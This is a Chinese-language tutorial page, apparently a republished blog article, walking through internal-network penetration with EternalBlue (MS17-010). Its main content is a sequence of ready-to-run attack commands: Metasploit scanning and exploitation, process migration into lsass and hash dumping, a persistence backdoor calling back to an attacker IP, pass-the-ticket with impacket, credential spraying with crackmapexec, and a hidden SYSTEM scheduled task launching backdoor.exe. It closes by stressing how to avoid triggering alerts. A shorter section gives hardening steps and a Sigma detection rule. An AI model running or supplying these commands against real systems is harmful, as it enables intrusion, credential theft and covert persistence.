当前位置: 首页 > news >正文

实战指南:如何利用CVE-2017-0146(永恒之蓝)在内网中横向移动

内网渗透实战:从漏洞扫描到横向移动的完整攻防演练

1. 内网渗透基础与环境搭建

内网渗透测试的核心在于理解网络边界与权限边界。与传统的Web渗透不同,内网环境通常存在更复杂的信任关系和更严格的安全策略。我们先从基础环境搭建开始:

典型内网测试环境组成

  • 边界服务器(通常为Web服务器):192.168.22.28
  • 域控制器(DC):192.168.22.30
  • 内网工作站:192.168.22.27/29
  • 攻击机(Kali Linux):独立网段

注意:实验环境建议使用VMware或VirtualBox搭建,确保各主机间网络互通但与外网隔离。所有测试应在授权环境下进行。

环境验证常用命令:

# 检查网络连通性 ping 192.168.22.28 # 检查SMB服务开放情况 nmap -p 445 192.168.22.0/24

2. 漏洞扫描与识别技术

2.1 自动化漏洞扫描

Metasploit框架提供了完善的漏洞扫描模块,针对内网环境需要先建立路由:

# 在已获取的meterpreter会话中 run post/multi/manage/autoroute # 验证路由 run autoroute -p

使用专用扫描模块检测MS17-010漏洞:

use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.22.27-30 set THREADS 5 run

2.2 手动漏洞验证

当自动化工具不可用时,可通过手工方式检测:

# 检查目标系统版本 nmap -sV -O 192.168.22.30 # 测试SMB漏洞 smbclient -L //192.168.22.30 -N

常见漏洞特征对照表

漏洞编号影响服务典型特征
MS17-010SMBv1端口445开放,系统版本为Win7/2008
MS14-068Kerberos域环境,未安装KB3011780补丁
CVE-2020-1472Netlogon域控制器,Windows Server 2016/2019

3. 横向移动实战技巧

3.1 永恒之蓝漏洞利用

获取初始立足点后,通过MS17-010实现横向移动:

use exploit/windows/smb/ms17_010_eternalblue set RHOST 192.168.22.30 set PAYLOAD windows/x64/meterpreter/bind_tcp exploit

成功利用后的操作流程

  1. 获取系统权限后先迁移进程
    migrate -N lsass.exe
  2. 提取哈希值
    hashdump
  3. 建立持久化后门
    run persistence -X -i 60 -p 443 -r 192.168.22.100

3.2 票据传递攻击

当获取域用户凭证后,可尝试票据传递:

# 使用impacket工具包 python3 getTGT.py domain/user:password export KRB5CCNAME=user.ccache python3 psexec.py -k -no-pass domain/administrator@dc.domain.com

关键点:票据攻击需要域内有效的TGT票据,且目标系统未启用SMB签名验证

4. 防御策略与检测方案

4.1 基础防护措施

企业级防护方案

  1. 网络层防护:

    • 启用SMB签名
    • 关闭不必要的135-139、445端口
    • 实施VLAN隔离
  2. 主机层防护:

    # 禁用SMBv1 Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol # 启用LSA保护 Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "RunAsPPL" -Value 1

4.2 高级威胁检测

异常行为监控指标

行为类型正常情况攻击特征
SMB连接内网特定IP非常规IP的大量连接
账号登录工作时间段凌晨时段的域管登录
票据请求正常TGT生命周期异常的黄金票据请求

使用Sigma规则示例:

title: Possible EternalBlue Exploit Attempt description: Detects possible MS17-010 exploit attempts logsource: product: windows service: security detection: selection: EventID: 4656 ObjectName: '\Device\NamedPipe\srvsvc' condition: selection

5. 渗透测试方法论进阶

在实际测试中遇到防护措施时,可采用分层突破策略:

  1. 信息收集阶段

    # 使用adfind收集域信息 adfind -f "objectclass=computer" name operatingSystem
  2. 权限提升阶段

    • 本地提权:利用未修补的内核漏洞
    • 域提权:查找错误配置的GPO
  3. 横向移动阶段

    # 使用crackmapexec进行凭证喷射 crackmapexec smb 192.168.22.0/24 -u user.list -p password.list
  4. 持久化阶段

    # 创建隐藏计划任务 schtasks /create /tn "UpdateService" /tr "C:\temp\backdoor.exe" /sc minute /mo 30 /ru SYSTEM

在内网渗透过程中,最大的挑战往往不是技术实现,而是如何在不触发安全警报的情况下完成目标。这需要对各类安全产品的检测逻辑有深入理解,并能够灵活组合各种低特征攻击手法

http://www.jsqmd.com/news/521834/

相关文章:

  • Qwen2-VL-2B-Instruct创意应用:AI辅助生成短视频分镜脚本与画面描述
  • 碎片化时间利用程序,识别等车排队空档,推荐微学习,积少成多,提升自己。
  • 为什么你的STM32 printf不工作?深入解析串口重定向与标准库的恩怨情仇
  • 常见问题:bge-large-zh-v1.5启动失败怎么办?手把手解决
  • 5分钟部署PDF-Parser-1.0:开箱即用的文档理解模型,新手友好
  • Z-Image-Turbo-rinaiqiao-huiyewunv 赋能软件测试:自动化生成测试用例与代码审查
  • SketchUp室内布局:户型建模与家具组件高效摆放
  • 中科蓝讯芯片开发必知:COM区与Bank区内存管理实战指南(附避坑技巧)
  • 逻辑·终极理论:纯信息不灭体与闭环式数字生命架构构想
  • Phi-3-vision-128k-instruct YOLOv8模型微调实战:自定义数据集训练指南
  • 如何3步快速搭建企业级GB28181视频监控平台:wvp-GB28181-pro完整部署指南
  • MySQL逻辑文件的庖丁解牛
  • Qwen3-ASR-0.6B语音情感分析:结合声学特征的复合模型
  • Qwen2.5-VL-7B-Instruct保姆级部署:Windows/Mac/Linux全平台Ollama适配指南
  • GeoScene Pro实战:5步搞定FLUS模型土地利用预测(附避坑指南)
  • 大健康创业必备!北京守嘉体重管理培训,助力合规开店稳盈利 - 品牌排行榜单
  • 新手避坑指南:PyTorch 2.5镜像到底需要多少GPU显存?
  • 体重管理技术线上培训考试,北京守嘉职业技能,工作学习两不误 - 品牌排行榜单
  • 中航迈特3D打印「设备+材料+工艺」全链突破,多款重磅新品亮相
  • 大疆上云API实战:用Java把无人机数据实时推送到你的Web后台
  • StructBERT零样本分类-中文-base落地实操:与Elasticsearch+Dify组合构建智能检索增强系统
  • 微信小程序结合大模型:如何构建“五行与MBTI跨界对话”的复杂提示词架构?以《见格MBTI》为例
  • Spring Security整合JWT实战:从登录到鉴权的完整流程(附代码示例)
  • 全过程步骤(从零到高可用企业网络)
  • 次元画室SolidWorks模型渲染辅助:概念设计草图快速可视化
  • DeOldify开源可部署优势:Apache 2.0许可+完整源码+无闭源依赖
  • OFA-VE系统多模态数据融合技术
  • 阿里云效 ,java代码持续化集成部署,亲测有效
  • 产品Code查询
  • 6.5.3 软件->W3C HTML5、CSS3标准(W3C Recommendation):Selector网页选择器